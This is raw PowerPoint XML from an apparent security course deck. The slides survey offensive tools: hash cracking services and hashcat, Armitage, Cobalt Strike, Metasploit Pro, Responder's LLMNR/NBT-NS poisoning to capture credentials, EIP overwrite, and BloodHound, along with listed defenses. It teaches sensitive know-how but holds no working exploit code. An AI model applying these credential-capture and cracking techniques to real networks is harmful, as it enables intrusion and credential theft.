        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37859426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Cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be done in the cloud, pass a hash, pay some $, and go!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cloudcracker.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.onlinehashcrack.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://mars.praetorian.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most of these use rainbow tables to precompute hashes to passwords and do fast lookups against that precomputed database of hashes -&gt; passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can buy a lot of graphics cards + a big case and DIY too</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14052868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B2C51-64EB-8044-A9B5-3E1C9413D361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>John Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCD46D72-D14F-6044-A7CD-C0882A3C6827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the John </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exercises</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8988568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7BE3-D082-BD43-BA0E-8E6906D4264F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hashcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C179FBF1-441E-2740-9A2A-62CCDE5F3C14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://hashcat.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>GPU-based password cracker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Supports pretty much every type of hash on the planet.  (See list on website)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --help </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>when in doubt.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27239336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Armitage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Team collaboration tool for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.fastandeasyhacking.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Share sessions, data, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Communication channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GUI and Client-Server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Armitage_5_shel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343" y="2417187"/>
            <a:ext cx="4899299" cy="4143924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38082744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Cobalt Strike</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Commercial version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> with a lot more tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Beacon – payload to manage remotely controlled hosts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Similar to Meterpreter but more functions around persistence and movement across a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cobaltstrike.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>One of the most common tools used by pen testers, red teamers, APTs, ransomware crews, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25424777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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Pro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Very cool, very $$$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Adds a GUI and team sharing features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Phishing campaigns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Auto hack!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> scan results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Built in VNC/screen grab/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>VPN Pivoting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14882013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Responder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/SpiderLabs/Responder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>An LLMNR, NBT-NS, MDNS poisoner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> if you can run this on the local network you can quickly start owning that whole network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Supports these protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>NTLMv1/NTLMv2/LMv2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Extended Security NTLMSSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Basic HTTP authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9792144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Responder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Rogue authentication modules for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>MS SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>FTP LDAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Since being introduced this has quickly become a favorite tool of every pen tester and APT out there.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21011326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Responder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> How it works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a Windows host can not resolve a hostname with DNS it will use the Local Link Multicast Name Resolution (LLMNR) protocol to ask local hosts on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If LLMNR fails, then the host tries NetBIOS Name Service (NBT-NS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The host will trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ANY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> information it is given from these requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At this point this is a race condition, similar to a rogue DHCP or ARP server, we respond before a legitimate host can = we win</a:t>
            </a:r>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245779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to EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The goal of most exploits to to rewrite the return address of the function you are in so you can point it to where you want it to go to (like the arbitrary code you want to run)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Your goal is to line everything up so the EIP register (part of the CPU) is filled with the return address of the code you want executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>EIP register = Next command to run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Control EIP = control that system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18603535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Responder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>When a host attempts to resolve a name not in DNS then Responder will poison the LLMNR and NBT-NS requests, directing them to Responder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Responder will then pretend to be the system the victim host wanted to access and will collect user credentials as they are supplied.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15897859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Responder - Hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Hashes are printed to standard out (screen) but also dumped into a file that is compatible with John the Ripper.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Stored in “logs” directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>File name format: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;MODULE&gt;-&lt;HASH-TYPE&gt;-&lt;IP-Address&gt;.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19616513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Responder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366" y="1285874"/>
            <a:ext cx="5538721" cy="5462997"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1890576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158" y="1257299"/>
            <a:ext cx="7729662" cy="5229225"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4395065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Responder - Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Disable LLMNR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Disable NetBIOS Name Service </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1238073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Responder Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="769146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BloodHound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/BloodHoundAD/BloodHound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tool to map and reveal the hidden relationships inside an AD environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can help you map an attack path that is highly complex with ease and otherwise would be not easy to identify.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defenders should also use this to identify those paths </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and mitigate them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20193558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Empire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
